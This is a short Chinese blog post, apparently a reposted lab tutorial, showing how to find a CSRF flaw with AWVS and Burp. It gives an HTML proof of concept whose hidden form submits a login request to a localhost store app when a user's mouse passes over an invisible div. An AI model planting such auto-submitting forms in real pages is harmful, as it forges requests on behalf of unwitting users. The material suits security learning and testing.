CSRF对表单派发事件

时间：2020-03-11 13:36:59 阅读：51 评论：0 收藏：0 [点我收藏+]

1、使用AWVS检测CSRF漏洞

2、使用burp生成poc

3、对poc进行修改

<html>
  <!-- CSRF自动登录poc -->
    <body>
        <script>
            function login(){
                document.getElementById("myForm").submit()
                // <input type="submit" onmouseover="login()" value="tijiao"/>,name值不可以为submit，否则提交失败
            }
        </script>
            <form id="myForm" action="http://localhost/store/user?method=login" method="GET">
                  <input type="hidden" name="username" value="test" />
                  <input type="hidden" name="password" value="test" />
                  <div onmouseover="login()">&nbsp;</div>
            </form>
    </body>
</html>

4、等用户划过指定的div，触发事件，实现登录

技术分享图片

5、登录成功

技术分享图片

CSRF对表单派发事件

原文：https://www.cnblogs.com/smartmsl/p/12461765.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)